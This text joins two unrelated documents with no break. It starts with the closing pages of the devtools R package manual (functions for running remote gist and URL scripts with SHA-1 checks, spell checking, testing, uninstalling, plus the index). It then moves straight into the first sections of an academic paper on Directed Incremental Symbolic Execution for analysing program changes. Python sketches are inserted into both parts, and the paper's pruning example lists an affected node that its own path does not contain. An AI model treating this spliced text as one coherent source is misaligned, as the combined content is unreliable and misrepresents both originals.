source_gist(6872663, sha1 = "54f1db27e60")
# Wrong hash will result in error
source_gist(6872663, sha1 = "54f1db27e61")
# You can specify a particular R file in the gist
source_gist(6872663, filename = "hi.r")
source_gist(6872663, filename = "hi.r", sha1 = "54f1db27e60")
```
source_url
Run a script through some protocols such as http, https, ftp, etc.
Description
If a SHA-1 hash is specified with the `sha1` argument, then this function will check the SHA-1 hash of the downloaded file to make sure it matches the expected value, and throw an error if it does not match. If the SHA-1 hash is not specified, it will print a message displaying the hash of the downloaded file. The purpose of this is to improve security when running remotely-hosted code; if you have a hash of the file, you can be sure that it has not changed. For convenience, it is possible to use a truncated SHA-1 hash, down to 6 characters, but keep in mind that a truncated hash won’t be as secure as the full hash.
Usage
`source_url(url, ..., sha1 = NULL)`
Arguments
- `url` url
- `...` other options passed to `source()`
- `sha1` The (prefix of the) SHA-1 hash of the file at the remote URL.
See Also
`source_gist()`
Examples
```r
## Not run:
source_url("https://gist.github.com/hadley/6872663/raw/hi.r")
# With a hash, to make sure the remote file hasn't changed
source_url("https://gist.github.com/hadley/6872663/raw/hi.r",
sha1 = "54f1db27e60b8b7e0486d78560490b49e8fe9f9")
# With a truncated hash
source_url("https://gist.github.com/hadley/6872663/raw/hi.r",
sha1 = "54f1db27e60")
## End(Not run)
```
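The security check described above boils down to comparing a (possibly truncated) SHA-1 prefix against the hash of the downloaded bytes. A Python sketch of the idea, using a hypothetical helper `check_sha1` (devtools implements this in R):

```python
import hashlib

def check_sha1(content: bytes, expected_prefix: str) -> bool:
    """Return True when the SHA-1 of `content` starts with the
    (possibly truncated) expected hash. Hypothetical helper, not
    part of devtools."""
    actual = hashlib.sha1(content).hexdigest()
    return actual.startswith(expected_prefix.lower())

body = b'cat("hi")\n'
digest = hashlib.sha1(body).hexdigest()
assert check_sha1(body, digest)        # full 40-character hash matches
assert check_sha1(body, digest[:6])    # 6-character truncated prefix matches
wrong = ("0" if digest[0] != "0" else "1") + digest[1:6]
assert not check_sha1(body, wrong)     # a wrong prefix is rejected
```

A truncated prefix trades security for convenience: with six hex characters an attacker only needs to collide on the prefix, which is why the docs recommend the full hash.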
spell_check
Spell checking
Description
Runs a spell check on text fields in the package description file, manual pages, and optionally vignettes. Wraps the spelling package.
Usage
spell_check(pkg = ".", vignettes = TRUE, use_wordlist = TRUE)
Arguments
pkg The package to use, can be a file path to the package or a package object. See as.package() for more information.
vignettes also check all rmd and rnw files in the pkg vignettes folder
use_wordlist ignore words in the package WORDLIST file
---
test Execute test_that tests in a package.
Description
test() is a shortcut for testthat::test_dir(); it runs all of a package’s tests. test_file() runs test() on the active file. test_coverage() computes test coverage for your package; it is a shortcut for covr::package_coverage() and covr::report(). test_coverage_file() computes test coverage for the active file; it is a shortcut for covr::file_coverage() and covr::report().
Usage
```r
test(pkg = ".", filter = NULL, stop_on_failure = FALSE, export_all = TRUE, ...)
test_coverage(pkg = ".", show_report = interactive(), ...)
uses_testthat(pkg = ".")
test_file(file = find_active_file(), ...)
test_coverage_file(
  file = find_active_file(),
  filter = TRUE,
  show_report = interactive(),
  export_all = TRUE,
  ...
)
```
Arguments
pkg
The package to use, can be a file path to the package or a package object. See as.package() for more information.
filter
If not NULL, only tests with file names matching this regular expression will be executed. Matching is performed on the file name after it has been stripped of "test-" and ".R".
stop_on_failure
If TRUE, throw an error if any tests fail.
For historical reasons, the default value of stop_on_failure is TRUE for test_package() and test_check() but FALSE for test_dir(), so if you’re calling test_dir() you may want to consider explicitly setting stop_on_failure = TRUE.
export_all
If TRUE (the default), export all objects. If FALSE, export only the objects that are listed as exports in the NAMESPACE file.
... additional arguments passed to testthat::test_dir() and covr::package_coverage()
show_report
Show the test coverage report.
file
One or more source or test files. If a source file is given, the corresponding test file will be run. The default is to use the active file in RStudio (if available).
uninstall
Description
Uninstall a local development package.
Usage
uninstall(pkg = ".", unload = TRUE, quiet = FALSE, lib = .libPaths()[[1]])
Arguments
pkg
The package to use, can be a file path to the package or a package object. See as.package() for more information.
unload
if TRUE (the default), will automatically unload the package prior to uninstalling.
quiet
If TRUE, suppress output.
lib
a character vector giving the library directories to remove the packages from. If missing, defaults to the first element in .libPaths().
See Also
with_debug() to install packages with debugging flags set.
Other package installation: install()
`wd`
*Set working directory.*
**Description**
Set working directory.
**Usage**
`wd(pkg = ".", path = "")`
**Arguments**
- `pkg`
The package to use, can be a file path to the package or a package object. See `as.package()` for more information.
- `path`
path within package. Leave empty to change working directory to package directory.
Index
*Topic programming
build_vignettes, 5
run_examples, 27
.libPaths, 32
.libPaths(), 15
activates, 13
as.package(), 3, 4, 6, 7, 9, 10, 12, 16, 17, 19, 20, 23–25, 27, 28, 31–33
bash, 2
browser(), 27
build, 3
build(), 10
build_manual, 4
build_readme, 4
build_site, 5
build_vignettes, 5
check, 6
check(), 9
check_built (check), 6
check_failures, 9
check_man, 9
check_rhub, 10, 12
check_win, 11, 11
check_win_devel (check_win), 11
check_win_oldrelease (check_win), 11
clean_vignettes, 12
clean_vignettes(), 6
compile_dll(), 21
compiler_flags, 8
covr::file_coverage(), 31
covr::package_coverage(), 31, 32
covr::report(), 31
create, 13
dev_mode, 15
dev_mode(), 14
dev_sitrep, 15
devtools, 13
devtools-package (devtools), 13
document, 16
document(), 7, 27
install, 17, 32
install(), 14
install_deps, 18
install_dev_deps (install_deps), 18
library(), 21, 22, 25
lint, 20
lintr::clear_cache(), 20
lintr::lint(), 20
lintr::lint_package(), 20
load_all, 21
load_all(), 25
load_code(), 21
load_data(), 21
missing_s3, 23
options(), 14
package_file, 23
pkgbuild::build, 4
pkgbuild::build(), 7, 12, 17, 19
pkgbuild::clean_dll(), 21
pkgdown::build_site(), 5
pkgload::load_all(), 21
r_env_vars(), 8
Rd2pdf(), 4
release, 24
release(), 8
reload, 25
reload(), 18
remotes::install_deps(), 18, 20
revdep, 25
revdep_maintainers (revdep), 25
rhub::check_for_cran(), 10
rhub::platforms(), 10
rhub::validate_email(), 11
rmarkdown::render(), 4
roxygen2::roxygenize(), 16
run_examples, 27
save_all, 28
show_news, 28
source(), 29, 30
source_gist, 29
source_gist(), 30
source_url, 30
source_url(), 29
spell_check, 31
spelling, 31
test, 31
test_coverage (test), 31
test_coverage_file (test), 31
test_file (test), 31
testthat::test_dir(), 31, 32
uninstall, 18, 32
unload(), 21, 25
update_packages(), 18
use_description(), 13
use_rstudio(), 13
uses_testthat (test), 31
usethis::use_release_issue(), 24
utils::as.person(), 14
wd, 33
with_debug(), 18, 32
withr::with_libpaths(), 18, 32
WORDLIST, 31
Directed Incremental Symbolic Execution
Suzette Person
NASA Langley Research Center
suzette.person@nasa.gov
Guowei Yang
University of Texas at Austin
gyang@ece.utexas.edu
Neha Rungta
NASA Ames Research Center
neha.s.rungta@nasa.gov
Sarfraz Khurshid
University of Texas at Austin
khurshid@ece.utexas.edu
Abstract
The last few years have seen a resurgence of interest in the use of symbolic execution—a program analysis technique developed more than three decades ago to analyze program execution paths. Scaling symbolic execution and other path-sensitive analysis techniques to large systems remains challenging despite recent algorithmic and technological advances. An alternative to solving the problem of scalability is to reduce the scope of the analysis. One approach that is widely studied in the context of regression analysis is to analyze the differences between two related program versions. While such an approach is intuitive in theory, finding efficient and precise ways to identify program differences, and characterize their effects on how the program executes has proved challenging in practice.
In this paper, we present Directed Incremental Symbolic Execution (DiSE), a novel technique for detecting and characterizing the effects of program changes. The novelty of DiSE is to combine the efficiencies of static analysis techniques to compute program difference information with the precision of symbolic execution to explore program execution paths and generate path conditions affected by the differences. DiSE is a complementary technique to other reduction or bounding techniques developed to improve symbolic execution. Furthermore, DiSE does not require analysis results to be carried forward as the software evolves—only the source code for two related program versions is required. A case-study of our implementation of DiSE illustrates its effectiveness at detecting and characterizing the effects of program changes.
Categories and Subject Descriptors D.2.5 [Software Engineering]: Testing and Debugging—Symbolic execution
General Terms Verification, Algorithms
Keywords Program Differencing, Symbolic Execution, Software Evolution
1. Introduction
Over the last three decades, symbolic execution [7, 22]—a program analysis technique for systematic exploration of program execution paths using symbolic input values—has provided a basis for various software testing and verification techniques. For each path it explores, symbolic execution builds a path condition, i.e., constraints on the symbolic inputs, that characterizes the program execution path. During symbolic execution, satisfiability checks are performed each time a constraint is added to the path condition to determine the feasibility of the path; if a path condition becomes unsatisfiable, it represents an infeasible path and symbolic execution does not consider any other paths that contain the known infeasible path as its prefix. The set of path conditions computed by symbolic execution can be used to perform various analyses of program behavior, for example, to check conformance of code to rich behavioral specifications using automated test input generation [10, 19].
Initial work on symbolic execution largely focused on checking properties of programs with primitive types, such as integers and booleans [7, 22]. Several recent projects generalized the core ideas of symbolic execution which enabled it to be applied to programs with more general types, including references and arrays [4, 10, 12, 19, 32]. These generalizations have been complemented by recent advances in constraint solving, which is the key supporting technology that affects the effectiveness of symbolic execution—checking path conditions for satisfiability relies heavily on the capabilities of the underlying constraint solvers. During the last few years, not only has raw computing power increased, enabling more efficient constraint solving, but basic constraint solving technology has also advanced considerably, specifically in leveraging multiple decision procedures in synergy, for example, as in Satisfiability Modulo Theory (SMT) solvers [9].
Scaling symbolic execution, as with other path-sensitive analyses, remains challenging because of the large number of execution paths generated during the symbolic analysis. This is known as the path explosion problem, and despite recent advances in reduction and abstraction techniques, remains a fundamental challenge to path-sensitive analysis techniques. A large body of work has been dedicated to developing techniques that try to achieve better scalability [1, 3, 11, 20]. One alternative approach to solving the problem of scalability is to reduce the scope of the analysis to only certain parts of the program.
Regression analysis is a well known example where the differences between program versions serve as the basis to reduce the scope of the analysis [14, 35, 38]. Analyses based on program
differences are attractive and have considerable potential benefits since most software is developed following an evolutionary process. And, with the recent push toward agile development, differences between two program versions tend to be small and localized. The challenge, however, lies in determining precisely which program execution behaviors are affected by the program changes. Techniques to identify modified parts of the program can be broadly classified into two categories: syntactic and semantic. Syntactic techniques consider differences in the program source code or some other static representation of the source and can be computed efficiently. Semantic techniques are typically more expensive, but also compute generally more precise differences by considering the differences in the execution behaviors of the program.
In Directed Incremental Symbolic Execution (DiSE), our insight is to combine the efficiencies of static analysis techniques that compute program difference information with the precision of symbolic execution. The path conditions computed by DiSE then characterize the differences between two related program versions. The essence of symbolic execution is that it abstracts the semantics of program behaviors by generating constraints on the program inputs. The constraints for a given program execution behavior (path), referred to as a path condition, encode the input values that will cause execution to follow that path. The goal of this work is to direct symbolic execution on a modified program version to explore path conditions that may be affected by the changes. Consider a set of concrete (actual) input values that generate paths $p$ and $p'$ in the original and modified versions of the program respectively. If symbolic execution of $p$ and $p'$ results in different path conditions, then the path condition generated along $p'$ is termed as affected.
Affected path conditions can be solved to generate values for the variables which, when used to execute the program, exhibit the affected program behaviors. The results of DiSE can then be used by subsequent program analysis techniques to focus on only the program behaviors that are affected by the changes to the program. DiSE enables other program analysis techniques to efficiently perform software evolution tasks such as program documentation, regression testing, fault localization, and program summarization.
The novelty of DiSE is to leverage the state-of-the-art in symbolic execution and apply static analyses in synergy to enable more efficient symbolic execution of programs as they evolve. Static analysis and symbolic execution form the two phases in DiSE. Program instructions whose execution may lead to the generation of affected path conditions are termed as affected locations or affected instructions. The goal of the first phase is to generate the set of affected program instructions. The static analysis techniques in the first phase are based on intra-procedural data and control flow dependences. The dependence analyses are used to identify instructions in the source code that define program variables relevant to changes in the program. Conditional branch instructions that use those variables, or are themselves affected by the changes, are also identified as affected. In the second phase, the information generated by the static analysis is used to direct symbolic execution to explore only the parts of the programs affected by the changes, potentially avoiding a large number of unaffected execution paths. DiSE generates, as output, path conditions only on conditional branch instructions that use variables affected by the change or are otherwise affected by the changes.
In this work, we develop a conceptual framework for DiSE, implement a prototype of our framework in the Java PathFinder symbolic execution framework [26, 28, 36], present a case-study to demonstrate the effectiveness of our approach, and demonstrate, as a proof of concept, how the framework enables incremental program analysis to perform software evolution related tasks. For the examples used in our case-study, DiSE consistently explores fewer states and takes less time to generate fewer path conditions compared to standard symbolic execution when the changes affect only a subset of the program execution paths. This demonstrates the effectiveness of DiSE in terms of reducing the cost of symbolic execution of evolving software. Furthermore, we apply the results of our analysis to test case selection and augmentation to demonstrate the utility of such an analysis.
We make the following contributions:
- A novel incremental analysis that leverages the state-of-the-art in symbolic execution and applies a static analysis in synergy to enable efficient symbolic execution of programs as they undergo changes.
- A technique for characterizing program differences by generating path conditions affected by the changes.
- A case-study that demonstrates the effectiveness of DiSE in reducing the cost of performing symbolic execution and illustrates how DiSE results can be used to support software evolution tasks.
2. Background and Motivation
We begin with a brief explanation of symbolic execution, the underlying algorithm used in DiSE. Next, we present an example to demonstrate the motivation for the development of DiSE.
2.1 Symbolic Execution
Symbolic execution is a program analysis technique for systematically exploring a large number of program execution paths [7, 22]. It uses symbolic values in place of concrete (actual) values as program inputs. The resulting output values are computed as expressions defined over constants and symbolic input values, using a specified set of operators. A symbolic execution tree characterizes all execution paths explored during symbolic execution. Each node in the tree represents a symbolic program state, and each edge represents a transition between two states. A symbolic program state contains a unique program location identifier (Loc), symbolic expressions for the symbolic input variables, and a path condition (PC). During symbolic execution, the path condition is used to collect constraints on the program expressions, and describes the current path through the symbolic execution tree. Path conditions are checked for satisfiability during symbolic execution; when a path condition is infeasible, symbolic execution stops exploration of that path and backtracks. In programs with loops and recursion, infinitely long execution paths may be generated. In order to guarantee termination of the execution in such cases, a user-specified depth bound is provided as input to symbolic execution.
We illustrate symbolic execution with the following example:
```java
int y;
...
int testX(int x){
1: if (x > 0)
2: y = y + x;
3: else
4: y = y - x;
5: }
```
This code fragment introduces two symbolic variables: $Y$, the symbolic representation of the integer field $y$, and $X$, the symbolic representation of the integer argument $x$ to procedure $\text{testX}$. For this example, symbolic execution explores the two feasible behaviors shown in the symbolic execution tree in Figure 1. When program execution begins, the path condition is set to $\text{true}$. When $X > 0$ evaluates to $\text{true}$ at line 1 in the source code, the expression $Y + X$
is computed and stored as the value of $y$. When $!(X > 0)$, the expression $Y - X$ is computed and stored as the value of $y$. A symbolic summary for procedure $testX$ is made up of path conditions that represent the feasible execution paths in $testX$. The path conditions in the symbolic summary can be used as input to a subsequent analysis, e.g., the solved path conditions can be used as regression test case inputs.
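The two path conditions in Figure 1 can be reproduced with a tiny enumerative symbolic executor. The sketch below is a toy Python model (not the JPF-based implementation DiSE uses): symbolic values are plain strings, and every combination of branch outcomes yields one path condition.

```python
from itertools import product

def symbolic_execute(branches):
    """Explore every combination of branch outcomes, building one path
    condition per path. `branches` is a list of (guard, (then_effect,
    else_effect)) pairs; effects mutate the symbolic state in place."""
    paths = []
    for outcomes in product([True, False], repeat=len(branches)):
        pc, state = [], {"y": "Y"}  # y starts as the symbolic input Y
        for (guard, (then_fx, else_fx)), taken in zip(branches, outcomes):
            if taken:
                pc.append(guard)       # guard holds on this path
                then_fx(state)
            else:
                pc.append(f"!({guard})")  # guard fails on this path
                else_fx(state)
        paths.append((" && ".join(pc), dict(state)))
    return paths

# testX: a single branch on X > 0 updating the symbolic value of y.
paths = symbolic_execute([
    ("X > 0",
     (lambda s: s.update(y=f"({s['y']}) + X"),
      lambda s: s.update(y=f"({s['y']}) - X"))),
])
assert paths == [("X > 0", {"y": "(Y) + X"}),
                 ("!(X > 0)", {"y": "(Y) - X"})]
```

A real symbolic executor would additionally call a constraint solver on each path condition and backtrack when it becomes unsatisfiable; this sketch omits feasibility checking.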
### 2.2 Motivating Example
We use the example in Fig. 2 to illustrate how DiSE leverages information about program changes to direct symbolic execution and generate path conditions affected by the changes. Consider the source code for method $update(int PedalPos, int BSwitch, int PedalCmd)$ shown in Fig. 2(a). The update procedure sets the value of two global variables, $AltPress$ and $Meter$, based on the input values of its arguments. Assume a change was made to the $update$ method at line 2 in Fig. 2(a) where the comparison operator is changed from $==$ to $<=$, as shown in the modified version of $update$ presented in Fig. 2(a). Using full symbolic execution to validate this change results in 21 path conditions, each of which represents a program execution path of the modified version of $update$. As expected, the results of full symbolic execution include all execution paths for $update$, and no distinction is made between affected and unaffected program paths. And, as a result, any validation technique which uses these results may unnecessarily analyze unaffected program behaviors. For a small example such as this, a full analysis may be feasible; however, for larger methods or when complex constraints are involved, a full analysis may be infeasible.
To characterize the effects of the change to $update$ using DiSE, we first compute the set of affected program locations. Consider the CFG computed for the modified version of $update$ shown in Fig. 2(b). Each node corresponds to a program location in the source code; we use the node label to identify the corresponding code statement(s), and a node identifier appears in italics just outside the node, e.g., $n_1$, $n_2$, etc. Edges between the nodes represent possible flow of execution between the nodes. Nodes in the CFG that correspond to affected and changed program instructions are termed as affected and changed nodes respectively.
DiSE uses the results of a lightweight source file differential analysis to identify $n_0$ as having a direct correspondence to the change at line 2. The results of the static analysis computing affected locations indicate that nodes $n_1$, $n_3$, $n_4$, $n_5$, $n_{11}$, $n_{13}$, and $n_{14}$ are affected write nodes–nodes that because of the change at line 2, may affect subsequent execution of a control node. Nodes $n_0$, $n_2$, $n_{10}$, and $n_{12}$ are affected control nodes–nodes that may be affected by the change and that may affect the path condition. The information about affected locations is used to direct symbolic execution of the modified version of $update$ to explore only the program behaviors affected by the change.
**Pruning.** To illustrate how DiSE prunes symbolic execution using the set of affected locations, consider a feasible execution path, $p_0 := \langle n_0, n_1, n_5, n_6, n_7, n_{10}, n_{11} \rangle$, generated during directed symbolic execution. The path $p_0$ contains the sequence of affected nodes, $\langle n_0, n_1, n_2, n_{10}, n_{11} \rangle$, and the sequence of unaffected nodes, $\langle n_6, n_7 \rangle$. However, another feasible path, $p_1 := \langle n_0, n_1, n_5, n_6, n_9, n_{10}, n_{11} \rangle$, is pruned during symbolic execution because the sequence of affected nodes is already covered by $p_0$. The only difference between $p_0$ and $p_1$ is the sequence of unaffected nodes—$p_1$ contains $\langle n_6, n_9 \rangle$ as the sequence of unaffected nodes. DiSE applies the same pruning technique throughout symbolic execution to generate a total of seven path conditions for $update$, versus the 21 path conditions generated by full symbolic execution. Each path condition generated by DiSE characterizes a program execution path that is affected by the change to $update$.
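The pruning rule can be stated compactly: explore a path only if its subsequence of affected nodes has not been seen before. A toy Python model of that rule (node names and the containment-based notion of "affected subsequence" are simplifications of the paper's analysis):

```python
def prune_paths(paths, affected):
    """Keep one representative path per distinct sequence of affected
    nodes, mimicking DiSE's pruning. Paths are node-name lists; this
    is a toy model, not the actual DiSE exploration strategy."""
    kept, seen = [], set()
    for path in paths:
        key = tuple(n for n in path if n in affected)  # project onto affected nodes
        if key not in seen:   # a new affected-node sequence: explore it
            seen.add(key)
            kept.append(path)
    return kept

affected = {"n0", "n1", "n2", "n10", "n11"}
p0 = ["n0", "n1", "n5", "n6", "n7", "n10", "n11"]
p1 = ["n0", "n1", "n5", "n6", "n9", "n10", "n11"]  # differs only in unaffected nodes
assert prune_paths([p0, p1], affected) == [p0]      # p1 is pruned
```

In the real technique the pruning happens on the fly during state-space exploration rather than on a completed path set, so pruned paths are never fully generated.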
---
**Figure 1.** Symbolic execution tree for $testX()$
**Figure 2.** A simplified version of a Wheel Brake System. (a) Example program. (b) Control flow graph.
3. Directed Incremental Symbolic Execution
In this section we first provide a high level overview of our DiSE technique. We then present the two main algorithms of DiSE that compute the set of affected path conditions.
3.1 Overview
Inputs to DiSE. The inputs to DiSE are the control flow graphs (CFGs) for two versions of a procedure, base and mod, and the results of a lightweight differential (diff) analysis (e.g., source line or abstract syntax tree diff) comparing the two versions of the procedure. The results of the diff analysis identify the locations of the differences in the source code between base and mod. During a pre-processing step, DiSE maps the change information to the corresponding nodes in each CFG. The CFG for the base version, \(CFG_{base}\), has nodes marked as removed, changed, or unchanged with respect to the CFG of the modified version, \(CFG_{mod}\). The nodes in \(CFG_{mod}\) are marked as added, changed, or unchanged with respect to \(CFG_{base}\). The results of the diff analysis are also used to compute a map (\(diffMap\)) that stores information relating nodes in \(CFG_{base}\) to their corresponding nodes in \(CFG_{mod}\).
Computing Affected Locations. DiSE begins by performing a conservative, intra-procedural analysis to compute the set of nodes in \(CFG_{mod}\) that may be affected by the removed nodes in \(CFG_{base}\) or by the changed and added nodes in \(CFG_{mod}\). This static analysis uses control dependence and data flow information to generate the set of affected CFG nodes in \(CFG_{mod}\). These nodes correspond to conditional branch statements and to write statements in the modified version of the program that either influence, or may be influenced by the modifications made to the procedure, and as a result, may affect the path conditions computed by symbolic execution.
Affected conditional branch nodes directly lead to the generation of affected path conditions. Affected write nodes indirectly lead to the generation of affected path conditions: they either define a variable that may subsequently be read at an affected branch node, or their reachability is control dependent on an affected conditional branch node.
Directed Symbolic Execution. During this step, DiSE performs a form of incremental symbolic execution on the modified version of the procedure, leveraging the information computed during the previous step to explore only the parts of the program that are changed with respect to the base version of the procedure. The affected nodes information directs DiSE to explore only (feasible) paths where one or more affected nodes in \(CFG_{mod}\) are reachable on that path, and that sequence of affected nodes has not yet been explored. If either of these conditions is not met, then symbolic execution backtracks. By effectively “pruning” paths that generate unaffected path conditions, DiSE avoids the cost of exploring execution paths in the modified program version that are not affected by the change(s) to the program. The resulting set of path conditions computed by DiSE then characterizes the set of execution behaviors in the modified version of the procedure that are affected by the change(s). Each (directly or indirectly) affected conditional branch node on the path is represented by a constraint in the path condition; conditional branch nodes that are not affected by the changes are represented by a constraint that represents a feasible path through the unaffected parts of the program.
3.2 Computing Affected Locations
The set of affected program locations is computed using conservative static analyses based on control and data dependences. The analysis is performed at an intra-procedural (per-method) level. As a result, DiSE does not generate affected path conditions arising from changes at the inter-procedural (sequence of methods) level. Extending the technique for inter-procedural system level analysis is part of our future work. We first present background definitions related to control flow graphs, control dependence, and data flow in order to define the rules DiSE uses to generate the affected locations sets.
Definition 3.1. A control flow graph (CFG) of a procedure in the program is a directed graph represented formally by a tuple \((N, E)\). \(N\) is the set of nodes, where each node is labeled with a unique program location identifier. The edges \(E \subseteq N \times N\) represent possible flow of execution between the nodes in the CFG. Each CFG has a single entry node, \(n_{begin}\), and a single exit node, \(n_{end}\). All the nodes in the CFG are reachable from \(n_{begin}\), and \(n_{end}\) is reachable from all nodes in the CFG.
Definition 3.2. (Check for a CFG Path) is a map \(IsCFGPath : N \times N \rightarrow \{T, F\}\) that returns true for a pair of nodes \((n_i, n_j)\) if there exists a sequence of nodes \(\pi := \langle n_0, n_1, \ldots, n_{|\pi|-1} \rangle\) such that \((n_k, n_{k+1}) \in E\) for \(0 \leq k < |\pi| - 1\), \(n_0 = n_i\), and \(n_{|\pi|-1} = n_j\); otherwise it returns false.
Definition 3.3. \(Vars\) is the set of variable names that are either read or written to in a procedure.
Definition 3.4. \(Cond\) is the set of nodes \(Cond \subseteq N\) where \(n \in Cond\) is a conditional branch instruction.
Definition 3.5. \(Write\) is the set of nodes \(Write \subseteq N\) where \(n \in Write\) is a write instruction.
Definition 3.6. (Variable Definitions) is a map \(Def : N \rightarrow Vars \cup \{\perp\}\) that returns a variable \(v \in Vars\) if the variable, \(v\), is defined at node \(n \in N\); otherwise returns \(\perp\).
Definition 3.7. (Variable Uses) is a map \(Use : N \rightarrow 2^{Vars} \cup \{\perp\}\) that returns the set of variables \(V \subseteq Vars\) where \(v \in V\) is a variable being read at node \(n\); if no variable is read at \(n\), it returns \(\perp\).
Definition 3.8. (Post Dominance) is a map \(postDom : N \times N \rightarrow \{T, F\}\) that returns true for an input pair of nodes \((n_i, n_j)\) if, for each CFG path from \(n_j\) to \(n_{end}\), \(\pi := \langle n_j, \ldots, n_{end} \rangle\), there exists a \(k\) such that \(n_i = n_k\), where \(0 \leq k \leq |\pi| - 1\); otherwise it returns false. In this case we say \(n_i\) post dominates \(n_j\).
Definition 3.9. (Control Dependence) is a map \(controlD : N \times N \rightarrow \{T, F\}\) that returns true for an input pair of nodes \((n_i, n_j)\) if node \(n_i\) has a successor \(n_k\), \((n_i, n_k) \in E\), such that \(postDom(n_j, n_k) = T\) and \(postDom(n_j, n_i) = F\); otherwise it returns false.
We provide intuitive descriptions for some definitions above using the example in Fig. 2. The set of \(Vars\) contains the variables \(AltPress, PedalPos, BSwitch, PedalCmd,\) and \(Meter\). \(Def(n_9)\) returns the variable \(Meter\) which is defined at line 13. Similarly the map \(Use(n_{10})\) returns \(PedalCmd\), the variable being used at line 15. The map \(postDom(n_5, n_0)\) returns true because all paths from node \(n_0\) to \(n_{end}\) have to go through \(n_5\); an example path is \((n_0, n_1, n_5, \ldots, n_{end})\). Finally, node \(n_1\) is control dependent on \(n_0\). The node \(n_0\) has two successors \(n_1\) and \(n_2\), where \(postDom(n_1, n_1)\) is true and \(postDom(n_1, n_0)\) is false.
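The \(postDom\) and \(controlD\) maps can be computed with a standard greatest fixed-point iteration over the CFG. The Python sketch below assumes a simplified edge set for the upper portion of the CFG in Fig. 2(b) ($n_0$ branching to $n_1$/$n_2$, $n_2$ branching to $n_3$/$n_4$, all merging at $n_5$; the exact edges are an assumption for illustration), and then evaluates the maps as in Definitions 3.8 and 3.9:

```python
# Assumed, simplified edge set for the top of the CFG in Fig. 2(b).
edges = {
    "n0": ["n1", "n2"],
    "n1": ["n5"],
    "n2": ["n3", "n4"],
    "n3": ["n5"],
    "n4": ["n5"],
    "n5": ["n_end"],
    "n_end": [],
}

def post_dominators(edges, end="n_end"):
    """pd[n] = {n} union the intersection of pd[s] over successors s of n."""
    nodes = list(edges)
    pd = {n: set(nodes) for n in nodes}  # start from the full set, shrink
    pd[end] = {end}
    changed = True
    while changed:
        changed = False
        for n in nodes:
            if n == end:
                continue
            new = {n} | set.intersection(*(pd[s] for s in edges[n]))
            if new != pd[n]:
                pd[n] = new
                changed = True
    return pd

pd = post_dominators(edges)

def post_dom(ni, nj):
    """Definition 3.8: ni lies on every path from nj to n_end."""
    return ni in pd[nj]

def control_d(ni, nj):
    """Definition 3.9: nj is control dependent on ni."""
    return any(post_dom(nj, nk) for nk in edges[ni]) and not post_dom(nj, ni)

print(post_dom("n5", "n0"))   # True: every path from n0 passes through n5
print(control_d("n0", "n1"))  # True: n1 post-dominates a successor of n0, not n0
```

Starting from full sets and intersecting makes the iteration monotonically decreasing, so it converges to the greatest fixed point, the correct post-dominator sets.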
Approach. Two sets of affected nodes are computed and used by DiSE: the set of affected conditional (branch) nodes, \(ACN\), and the set of affected write nodes, \(AWN\). These sets initially contain the nodes in \(CFG_{mod}\) that are marked as changed or added by the source line diff analysis. (Handling changes arising from removed nodes in \(CFG_{base}\) is described later in this section.) The \(ACN\) and \(AWN\) sets are updated by applying the rules specified in Fig. 3 until the sets reach a fixed-point. The analysis is guaranteed to terminate since the \(ACN\) and \(AWN\) sets contain nodes in a CFG; even nodes that are part of a loop are added at most once to these sets.
The rules in Fig. 3 specify the conditions under which DiSE adds nodes from \(CFG_{mod}\) to the affected sets based on the control and data flow dependences in the procedure.
if \( n_i \in ACN \land n_j \in \text{Cond} \land \text{controlD}(n_i, n_j) \)
then \( ACN := ACN \cup \{n_j\} \) \hspace{1cm} (1)
if \( n_i \in ACN \land n_j \in \text{Write} \land \text{controlD}(n_i, n_j) \)
then \(AWN := AWN \cup \{n_j\} \) \hspace{1cm} (2)
if \( n_i \in AWN \land n_j \in \text{Cond} \land \text{Def}(n_i) \in \text{Use}(n_j) \)
\( \land \text{Def}(n_i) \neq \bot \land \text{IsCFGPath}(n_i, n_j) \)
then \( ACN := ACN \cup \{n_j\} \) \hspace{1cm} (3)
Figure 3. Updating affected sets based on control and data flow dependence.
if \( n_i \in \text{Write} \land (n_j \in AWN \lor n_j \in ACN) \)
\( \land \text{Def}(n_i) \in \text{Use}(n_j) \land \text{Def}(n_i) \neq \bot \land \text{IsCFGPath}(n_i, n_j) \)
then \(AWN := AWN \cup \{n_i\} \) \hspace{1cm} (4)
Figure 4. Updating \(AWN\) set based on reaching definitions.
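The fixed-point application of rules (1)-(4) can be sketched on a small hypothetical five-node procedure; the node names, edges, and Def/Use maps below are invented for illustration and are not the WBS example:

```python
# Hypothetical mini-CFG: conditional "a" branches to writes "b"/"c", which
# merge at conditional "d"; "e" is a write guarded by "d".
edges = {"a": ["b", "c"], "b": ["d"], "c": ["d"],
         "d": ["e", "end"], "e": ["end"], "end": []}
cond  = {"a", "d"}                       # conditional branch nodes
write = {"b", "c", "e"}                  # write nodes
defs  = {"b": "x", "c": "y", "e": "z"}   # Def map (variable defined at node)
uses  = {"d": {"x"}}                     # Use map (variables read at node)

def reachable(src):
    """Nodes n with IsCFGPath(src, n) = T."""
    seen, stack = set(), [src]
    while stack:
        for s in edges[stack.pop()]:
            if s not in seen:
                seen.add(s)
                stack.append(s)
    return seen

# Greatest fixed point for post-dominator sets.
pd = {n: set(edges) for n in edges}
pd["end"] = {"end"}
updated = True
while updated:
    updated = False
    for n in edges:
        if n == "end":
            continue
        new = {n} | set.intersection(*(pd[s] for s in edges[n]))
        if new != pd[n]:
            pd[n], updated = new, True

def control_d(ni, nj):
    """Definition 3.9: nj is control dependent on ni."""
    return any(nj in pd[nk] for nk in edges[ni]) and nj not in pd[ni]

def affected_sets(changed_nodes):
    acn = {n for n in changed_nodes if n in cond}
    awn = {n for n in changed_nodes if n in write}
    while True:
        before = (set(acn), set(awn))
        for nj in edges:
            # Rules (1)/(2): nj is control dependent on an affected conditional.
            if any(control_d(ni, nj) for ni in set(acn)):
                if nj in cond:
                    acn.add(nj)
                if nj in write:
                    awn.add(nj)
            # Rule (3): conditional nj reads a variable defined at an affected write.
            if nj in cond and any(defs.get(ni) in uses.get(nj, set())
                                  and nj in reachable(ni) for ni in set(awn)):
                acn.add(nj)
        # Rule (4): a write whose defined variable is used at an affected node.
        for ni in write:
            if any(defs.get(ni) in uses.get(nj, set()) and nj in reachable(ni)
                   for nj in acn | awn):
                awn.add(ni)
        if (acn, awn) == before:
            return acn, awn

acn, awn = affected_sets({"a"})   # "a" is the changed conditional
print(sorted(acn), sorted(awn))   # ['a', 'd'] ['b', 'c', 'e']
```

Here "d" enters \(ACN\) via rule (3) (it reads "x", written at the affected write "b"), and "e" enters \(AWN\) via rule (2) once "d" is affected, mirroring how the rules propagate in the WBS example.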
